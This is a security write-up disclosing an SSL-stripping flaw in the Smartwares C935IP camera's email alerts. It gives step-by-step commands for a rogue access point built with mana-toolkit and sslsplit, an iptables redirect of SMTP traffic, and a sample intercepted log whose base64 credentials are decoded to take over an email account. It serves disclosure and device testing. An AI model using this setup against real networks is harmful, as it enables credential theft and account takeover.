Detecting the Smartwares C935IP SSL VulnerabilityAuthor: Mathis Hagen
Date: 2017-05-24 13:44:37
In this Article we are going to have a look at how we found the vulnerability of the Smartwares C935IP camera.The cameras email functionality was vulnerable to a MITM Attack using sslstrip as described in our short report. The Vulnerability leads to the possible corruption of the targeted email account. We will explain how we set up a host machine for an access point (AP) and how to set up the mana-toolkit, our tool of choice in this case. Our Goal is having an AP with an active Internet connection and sslsplit/sslstrip running.
Obviously this works the best with linux so we are going to assume that we are using a linux system and the APT packet manager. We assume further that our host system has an active Internet connection via WIFI/LAN. It is probably helpfull to use an external WIFI card for hosting the AP, we, as well as sensepost, recommend the TL-WN722N USB card, mainly because it is cheap and features packet injection. The next step is the installation of the needed software. As mentioned earlier we are going to use the mana-toolkit. It is a toolkit created by sensepost and presented at Defcon 22 which is great at setting up rogue APs or, in our case, setting up an AP with sslsplit, sslstrib, firelamb and net-creds almost out of the box. If you are using Kali you can install it from the repositories via
sudo apt install mana-toolkit
Otherwise you have to do it from git. We are going to do this in Ubuntu 16.04.2. We are going to install it under /opt/mana by going to /opt and checking out the repository.
cd /opt git clone --depth 1 https://github.com/sensepost/mana cd mana git submodule init git submodule update
Afterwards we should have all files needed. But before we run make we have to install some dependencies. We could use the ubuntu install script but it won't work. We can install the needed packages via apt with
sudo apt update sudo apt install libnl-genl-3-dev dnsmasq tinyproxy libssl-dev apache2 macchanger python-dnspython python-pcapy dsniff stunnel4 python-scapy libevent-dev make sudo make install
Now we can install the mana-toolkit with
make sudo make install
We could use the toolkit now but first we want to install sslsplit from github because it has an experimental feature we need. To do so we clone the sslsplit git directory and run make like this:
git clone https://github.com/droe/sslsplit cd sslsplit make sudo make install
After installing sslsplit we are going to have a look at the mana-toolkit start script we are going to use later. It is located at /opt/mana/run-mana/start-nat-full.sh. There are a couple of other scripts but for now we will stick with start-nat-full.sh. This script starts a NATed AP with the full functionality of the mana-toolkit. We need to change a couple of things now.
- Modify /opt/mana/run-mana/start-nat-full.sh
- Change the upstream variable to the name of the interface with an active Internet connection.
- Change the phy variable to the name of the interface that should host the AP
- Modify the sslsplit section
- add "autossl 0.0.0.0 10587 \" to the first block.
- add "iptables -t nat -A PREROUTING -i $phy -p tcp --destination-port 587 -j REDIRECT --to-port 10587" to the second.
- Modify /etc/mana-toolkit/hostapd-mana.conf
- To set a password for your AP add the following to the first block
- wpa_pairwise=TKIP CCMP
- And to disable the actual mana feature set "enable_mana=0"
- You may also make the AP hidden by changing "ignore_broadcast_ssid"
Now we are good to go.
After configuring our setup it is time to use it. So the first thing to do is to start our AP using our modified start-nat-full.sh script.
The next thing to do is to connect the smartphone -with the OMGuard HD app- and the camera to our AP and also connect them to each other. Then you have to enable the alert email tick box in the cameras settings and enter your account information in the advanced settings tab. If you decide to use e.g. a gmail account you can enable sSSL but it is not necessary or important since we can attack both, SSL and STARTLS. As soon as you trigger the alert now, via audio or motion, an email will be sent from the account specified by you. And sslsplit will intercept and log the communication with the mail server. The log location is at /var/lib/mana-toolkit. They should contain a passage similar to this:
220 smtp.gmail.com ESMTP o22sm6089025wro.13 - gsmtp
250-smtp.gmail.com at your service, [220.127.116.11]
250-AUTH LOGIN PLAIN XOAUTH2 PLAIN-CLIENTTOKEN OAUTHBEARER XOAUTH
AUTH LOGIN dXNlcm5hbWVAZ21haWwuY29tCg== (firstname.lastname@example.org base64 encoded)
cGFzc3dvcmQK (password base64 encoded)
235 2.7.0 Accepted
. 250 2.0.0 OK 1490279709 o22sm6089025wro.13 - gsmtp QUIT 221 2.0.0 closing connection o22sm6089025wro.13 - gsmtp
Now we just need to decode the base64 encoded username and password and we have full access to the account.
Although or rather because this is a very simple test it is nice to have it available since it provides a fast and easy way to test devices for possible vulnerabilities in their SSL/TLS implementations.
Who we are & Disclaimer